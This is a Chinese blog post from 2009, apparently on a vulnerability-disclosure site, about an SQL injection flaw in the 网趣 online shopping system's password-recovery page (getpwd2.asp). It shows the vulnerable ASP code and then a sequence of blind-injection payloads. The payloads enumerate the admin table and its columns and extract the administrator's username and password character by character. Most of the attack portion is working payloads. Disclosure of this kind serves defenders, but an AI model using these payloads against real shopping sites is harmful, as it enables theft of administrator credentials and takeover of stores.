网趣网上购物系统SQL注入漏洞--getpwd2.asp

2009, December 4, 1:01 PM. 漏洞集研
Submitted by admin

网趣网上购物系统是一套简单易用、功能强大、用户使用最为广泛的网上购物开店平台,凭借多年的网上购物系统研发经验,软件功能日趋强大与完善、依托庞大的用户使用群体,网趣网上购物系统越来越受到用户的青睐,成为众多用户网上开店首选品牌。

这是官方的话 ↑
这个sql injection出现在找回密码处,最新版本的9.4也存在漏洞,随后对v9.0等以下版本测试均存在漏洞。

漏洞页面:getpwd2.asp

漏洞代码:
<%
username=request.form("username")
set rs=Server.CreateObject("Adodb.Recordset")
sql="select * from [user] where username='"&username&"' "
rs.open sql,conn,1,1
If rs.eof Then
%>

典型的注入,和以前的网软购物系统一个模样

http://127.0.0.1/cnhww9.4/getpwd.asp
getpwd.asp是找回密码的页面,输入的用户名交给getpwd2.asp处理,若存在用户名到达第二步,否则退出

大小: 15.32 K
尺寸: 403 x 131
浏览: 46 次
点击打开新窗口浏览全图

输入 test' and 1=1 and ''='
跳到getpwd2.asp 第二步

大小: 17.77 K
尺寸: 402 x 145
浏览: 35 次
点击打开新窗口浏览全图

输入 test' and 1=2 and ''='
提示没有这个用户

大小: 15.38 K
尺寸: 291 x 156
浏览: 47 次
点击打开新窗口浏览全图

猜表 ->cnhww

test' and exists (select * from [admin]) and '1'='1    F
test' and exists (select * from [cnhww]) and '1'='1    T


   字段 ->admin password
test' and exists (select admin from [cnhww]) and '1'='1      T
test' and exists (select password from [cnhww]) and '1'='1   T

   值 -->
test' and (select top 1 asc(mid(admin,1,1)) from cnhww)>97 and '1'='1   F
test' and (select top 1 asc(mid(admin,1,1)) from cnhww)>96 and '1'='1   T
97=a
test' and (select top 1 asc(mid(admin,2,1)) from cnhww)>100 and '1'='1   F
test' and (select top 1 asc(mid(admin,2,1)) from cnhww)>99 and '1'='1    T
100=d

……


test' and (select top 1 asc(mid(password,1,1)) from cnhww)>55 and '1'='1

 

Tags: 网趣

« 上一篇 | 下一篇 »

只显示10条记录相关文章
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):